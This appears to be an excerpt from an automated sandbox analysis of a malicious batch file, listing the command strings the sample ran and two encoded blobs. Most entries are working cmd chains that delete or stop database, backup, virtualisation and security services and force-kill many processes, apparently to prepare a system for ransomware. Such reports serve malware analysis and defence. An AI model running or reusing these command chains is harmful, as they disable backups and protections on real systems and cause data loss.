        Source: cmd.exe, 00000008.00000003.2500068266.0000000002B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr &
        Source: cmd.exe, 00000008.00000003.2528979487.0000000002B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @ne
        Source: cmd.exe, 00000008.00000003.2544595898.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.
        Source: R1TftmQpuQ.batBinary or memory string: 7l5RBuT/Lyvbd0JCl2K0/h00m14JrfCPTXiQ5KyFoMSDacmhS0HSl0NGbHnrpJrNEz28XtBZDB4P+/jt+G2Imp6nngidVxn1IErk7K+yqFEJfkXgQGMXrg/NZE+o8Bmx11G0JKuCVddz/MZsvu7Y52OVFD638GYTRET7oOW8Fm1N/2Q5EseP6gdrQIwQXKTjVpQHDmFqBaeTWCjnjAvyhSDV2GBKF+KwuOj7TRlNbchAbJKG35PMarz00FMoy+LA1ENhuHU+LKtaDL3fAVuGXycvN7rymH134B+KqEMUBesFCoP+/dSK/vOq5QQM0F+vpfvdwWb+bxv4/fbPFtLHlSkTNzpDyoqhrdC/HBW5D+EjMsSaPBmn+AaZR4QzA1ROlVFAQAWsHyia6kL7fZM3yvJTDK64EndQzNIHogUVx4wUJROdC7I5lGTGbpS0hgO0nk9xYJqnQJdjvIKIio+xuEKDKi4dh68PTqgnVkzdaGv6SHalaWNFbjG/xTTeBOax7goZvh3Sa3n5EbhBONMozLX0kn3p7AO3mntjtDlBvyMga4TFwyldouZ7OG3FuhwV3FEnvc0M0UR6BVkG+ibghzvACieDIVuD5C2Srg17a05DyZ2W+tCrcW1syRDDr5TGsr5Hnr912I0WbeS07ZABuO/wu+5CmURc5EukmmTe83uMmlmBjMHJfkPDylbJgNIHZVBOeVjHlOhBLQTXy+XnIgF1dxTa+zn7qBUh+ag1pjZqGJ4Mv6Rpz0f79pOjD3uWAfF1AXvgPQan6G9BHxMJPlpXQGq7FhmtefVJXaO+AJLhe5V7ihgBlm5ukhBEQImWnbZW7b9SbSMoJum5b4ivZftfaSo8CFm7kUmcGHK+hJ0C+l33jk+vRSQipAtudRNoZ9ITcDk8CdckVhAHy/vmQvjJ6W3/z9/oIOfc/A
        Source: cmd.exe, 00000008.00000003.2455934121.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
        Source: cmd.exe, 00000008.00000003.2557590841.00000000027C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start "killer" cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /
        Source: cmd.exe, 00000008.00000003.2529832055.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F
        Source: cmd.exe, 00000008.00000003.2557590841.00000000027C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM
        Source: cmd.exe, 00000008.00000003.2469434536.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
        Source: cmd.exe, 00000008.00000003.2469481264.0000000002B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
        Source: cmd.exe, 00000008.00000003.2533615018.00000000027C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start "killer" cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill
        Source: R1TftmQpuQ.batBinary or memory string: AK4jXyhtxFXXRtJ2Hp/3Lt6xod6xplMLMjv3l53HW62v2Rt2VtGUn+fcwsFWzn5AqulpnXIF7c94iyP8vmciUXoXdinQtE6ZIfyiR+rMfy5+84/8zCJeg57pw6DqJ7DD+ky3yCYiPAcbht/JqHXfo/0HAunyMN2G7KPrVt1AxFR1h9hT44WmKmY+16RE7fQvkPtb/ZJf9hGTuGhiciIQ4omMz8eMI9elbD7ThCyON67IcjP7xyl4NXfRFO2sur5dU2dPkAyclyEOc47BUvrJzR9NL4SOEBz5Rq+F449RzLtcEDPcKPKWeq9o+1wQ1Q9UA2kbsJoOZ1kF8h7wrw7Pu9LeHe1l3kFXcTSgcoBWTsn7N4lT7PLGwQ92Fig1yXnPQn7F+ck7cI6caoVd1nGa9/0wftiA/aN3nt4BQ48nYRtUzfTAo9bol2HcReBreUttkLhpyY0QA6w3tL+IroEPWehsuu6atfKbdh6b1nb+cZsQG6bq/w2TZEfIwYrEBe7RF4RIwX9m+AkZQnxwXXrxO5cl/aG3wLrZgE4ByxJafQbjM4i0rvRbh18TfmG1RZaf9xqdobEDMvzRySjTljvLHWWo2OqaCqpIcdR1rrmtzZremp9dzvG3/4AqXZoy9gz19ymgSP1p6+rtdqSv9YXhn8R8JazfxgHcwYK/yz+vQ2a+Kl0YZj2Zc/8tuv2iPTP6/XVdtj2Ki4EN3ID/ip3LDxVVnoINjxVnKyGh6aDxKtacDGdqSIT+6e/X9reSqJMO5575/29/EfuI09xLJnoz/OD+BT4sv5l9gJDvDaeP4FsLiI/w/w2m32Gwqe4Rt4htlqIYDRMFk6PvgLl3z9C4/9N7+mSzyDwVNceeTD1NfHc31t9ycKk1Cdf3AdsV+xPNWpdT5hlaif7yXR11X/o7izf/JB3oWKx8j296Ax
        Source: cmd.exe, 00000008.00000003.2557092127.0000000002B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill 